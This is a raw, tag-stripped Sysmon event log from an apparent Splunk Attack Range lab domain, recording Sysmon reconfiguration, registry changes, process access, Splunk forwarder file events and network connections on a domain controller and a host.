08:07:42.793{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\ConfigHashSHA256=E320A8D07D726007039F08B51C9F062E31DA98D37745B5619B1E7AF0A0D52D95 13241300x80000000000000001054651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:07:42.793{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\ConfigFileC:\Program Files\ansible\AttackRangeSysmon.xml 16341600x80000000000000001054650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local2021-07-12 08:07:42.793C:\Program Files\ansible\AttackRangeSysmon.xmlSHA256=E320A8D07D726007039F08B51C9F062E31DA98D37745B5619B1E7AF0A0D52D95 13241300x80000000000000001054649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:07:42.793{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\RulesBinary Data 13241300x80000000000000001054648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:07:42.793{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\DnsLookupBinary Data 13241300x80000000000000001054647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:07:42.793{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\CheckRevocationBinary Data 13241300x80000000000000001054646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:07:42.793{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\HashingAlgorithmDWORD (0x8000000e) 13241300x80000000000000001054645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:07:42.793{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\OptionsDWORD (0x00000007) 12241200x80000000000000001054644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 08:07:42.793{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\Rules 2553225500x80000000000000001054643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local2021-07-12 08:07:42.793ConfigMonitorThreadFailed to send message to the driver to update configuration - Last error: The system cannot find the file specified. 12241200x80000000000000001054642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 08:07:42.778{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\DnsLookup 12241200x80000000000000001054641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 08:07:42.778{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\CheckRevocation 12241200x80000000000000001054640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 08:07:42.778{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\HashingAlgorithm 12241200x80000000000000001054639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 08:07:42.778{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\Options 10341000x80000000000000001054638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.647{466BC892-F49A-60EB-327D-00000000CF01}61886504C:\Windows\system32\conhost.exe{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.647{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.647{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.647{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.647{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.647{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.647{466BC892-F49A-60EB-317D-00000000CF01}95726844C:\Windows\system32\cmd.exe{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.631{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-Sysmon64.exe -c "C:\Program Files\ansible\AttackRangeSysmon.xml"C:\Program Files\ansible\sysmon\ATTACKRANGE\Administrator{466BC892-F49A-60EB-D4CC-F90400000000}0x4f9ccd43HighMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 23542300x80000000000000001054630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.047{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF663C9B0FBD5F33E01D3E05375D139C,SHA256=6E98DF1B3DC9CB413D774DC42FE0FD84843EC6C0E80448FF173D4C3DAFD89F9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.027{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2950C9E43CBA817532E613D12344C859,SHA256=A03E13BC503DD9AB57EFBA813EAB1BC157679C81193FF2E5A5916184527238FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.026{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C8EB7269E1D02F01C5FF7821748D9594,SHA256=AFF88296CC4F4EE3359B30396440F787DE28FF8F95676929BF86F904141A7732,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810388Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:42.699{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-44174-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000810387Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:43.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A01D1EB8401CB7E425FB89DF40FA0C60,SHA256=BA919E884D12C8272B6FE53704080F52A38525C3ECB1F5A200542F9C7C73BEFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:43.662{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0DC481D8325B0E46D34A43FBF8CA67FF,SHA256=9231EF0CDFA5EA90F762788BE78F583087FF6B7E61DC1EA28F62CEDA39061FE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:43.047{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7CCDF5E5D26F59D64F5DA28E2204D23,SHA256=297A1844EC115C617F7317E39592F72F23E03418C86AA2D93F0E5FD906A815B1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810392Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:43.302{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57462-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000810391Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:44.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=04E36365C2237E66041194ED9ADC5E5F,SHA256=159586B5154D8EF676E869671C02AA528985EB182A1F447FD485402C8AC03DA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810390Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:44.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=832ACFCDE0F3976DDA3986F5515014CC,SHA256=9B7E0B54170A94CB6E978DEE0CE910F6AF37071726CE0C218270A49CC412FE3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810389Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:44.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFE29CDD39D7ECE93895BA4A636531F1,SHA256=284DCF4C4192780BD313D67DC53AE14AE8BFFEF6B954426879DD8502C809F483,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.677{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57462-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001054655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:44.062{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=747A33615C05A11472C509D3BBA25EE2,SHA256=DF2AD79893D6DDA14424E14F8A4CA63F368806FD21ACE68177231381E53F8EDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:45.092{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BDF3565D92EF0675C755835846407F3,SHA256=68ECF5012E4D1F2893882B98AE326DEC1A5EE5A9C97E60F72DC7BDDDE335288A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810393Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:45.189{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68915C6B99544330384108E358A06399,SHA256=897A3A5FE0E5BD08BEE4AA631BC3F4378F88DFC3CE6F8DA4B518591DC5B0114B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:38.750{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61968-false10.0.1.12-8000- 10341000x80000000000000001054681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.862{466BC892-F49A-60EB-327D-00000000CF01}61886504C:\Windows\system32\conhost.exe{466BC892-F852-60EB-F17D-00000000CF01}8404C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.862{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.862{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.862{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.862{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.862{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F852-60EB-F17D-00000000CF01}8404C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.862{466BC892-F49A-60EB-317D-00000000CF01}95726844C:\Windows\system32\cmd.exe{466BC892-F852-60EB-F17D-00000000CF01}8404C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.871{466BC892-F852-60EB-F17D-00000000CF01}8404C:\Program Files\ansible\sysmon\Sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-Sysmon64.exe -c C:\Program Files\ansible\sysmon\ATTACKRANGE\Administrator{466BC892-F49A-60EB-D4CC-F90400000000}0x4f9ccd43HighMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 10341000x80000000000000001054673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.662{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+59c7f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001054672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 